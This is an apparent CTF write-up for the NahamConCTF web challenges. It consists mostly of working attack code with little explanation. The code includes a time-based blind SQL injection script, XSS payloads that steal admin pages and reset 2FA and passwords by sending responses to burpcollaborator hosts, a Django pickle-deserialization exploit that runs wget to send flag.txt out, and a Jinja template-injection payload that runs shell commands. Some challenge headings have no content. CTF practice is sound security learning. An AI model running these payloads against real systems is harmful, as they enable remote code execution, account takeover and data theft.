NahamConCTF — Web Challenges

Personnel

EXtravagant

Jurassic Park

Flaskmetal Alchemist

  1. The app’s main function is a search function (SQLi is first candidate here)
  2. The flag follows the pattern of flag{[a-z]+_[a-z]+_[a-z]+} .
  3. The fma.zip file.
#!/usr/bin/env python3import requests
import string
import time
chars = ‘_}abcdefghijklmnopqrstuvwxyz’url = ‘http://challenge.nahamcon.com:30107/'
headers = {
‘Content-Type’: ‘application/x-www-form-urlencoded’
}
flag = “flag{“
proxy = {
‘http’: ‘http://10.23.58.1:8080'
}
for i in range(6, 21):
for char in chars:
data = f’search=fl&order=1 AND (case when substr((select flag from flag),{str(i)},1)=”{char}” then 1=randomblob(500000000/4) else 1=randomblob(10000) end)’
req = requests.post(url, data=data, headers=headers, proxies=proxy, timeout=10)
if int(req.elapsed.total_seconds()) >= 3:
flag += char
print(f”[+] Valid Character Found: {char}\nResponse time: “ + str(int(req.elapsed.total_seconds())))
#the flag is 20 chars long
print(“[+] Flag extracted: “ + flag)

Hacker Ts

<script>
var req = new XMLHttpRequest();
req.open(“GET”, “http://localhost:5000/admin", true);
req.onreadystatechange = exfil;
req.send();
function exfil(){
location = “http://zdg8qpo8j2mvfca9lh6jx7dzkqqie7.burpcollaborator.net/?resp=" + encodeURIComponent(req.responseText);
};
</script>

Poller

import os
import subprocess
from django.core import signing
from django.contrib.sessions.serializers import PickleSerializer
import sys
import requests
class Exploit(object):
def __reduce__(self):
return (subprocess.Popen, (
(“”” python -c ‘import os;os.system(“wget http://9x7m994nkzrws6774697m1quyl4cs1.burpcollaborator.net/$(cat flag.txt)”);’ “””),
0, # Bufsize
None, # exec
None, #stdin
None, #stdout
None, #stderr
None, #preexec
False, #close_fds
True, # shell
))
print(signing.dumps(Exploit(),
salt=’django.contrib.sessions.backends.signed_cookies’,
serializer=PickleSerializer,
compress=True,
key=’77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!’))

Two For One

<script>
var req = new XMLHttpRequest();
var url = 'http://challenge.nahamcon.com:30115/reset2fa';
req.open('POST',
url, true);
req.withCredentials = true;
req.onreadystatechange = exfil;
req.setRequestHeader('Content-Type', 'application/json');
req.send(null);
function exfil(){
var attacker = 'http://tlihmptf6rke1aspcnxfwy5m7dd51u.burpcollaborator.net/?url=';
var send = new XMLHttpRequest();
send.open('GET',attacker + encodeURIComponent(req.responseText),true);
send.send(null);
}
</script>
<script>
var req = new XMLHttpRequest();
var url = ‘http://challenge.nahamcon.com:30115/reset_password';
req.open('POST',
url, true);
req.withCredentials = true;
req.onreadystatechange = exfil;
req.setRequestHeader(‘Content-Type’, ‘application/json’);
req.send(JSON.stringify({\”otp\”:\”123456\”,\”password\”:\”password\”,\”password2\”:\”password\”}));
function exfil(){
var attacker = ‘http://tlihmptf6rke1aspcnxfwy5m7dd51u.burpcollaborator.net/?url=';
var send = new XMLHttpRequest();
send.open(‘GET’,attacker + encodeURIComponent(req.responseText),true);
send.send(null);
}
</script>

DeafCon

shellbreak{{request.application.__globals__.__builtins__.__import__(‘os’).popen(‘cat${IFS}flag.txt’).read()}}@gmail.com

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store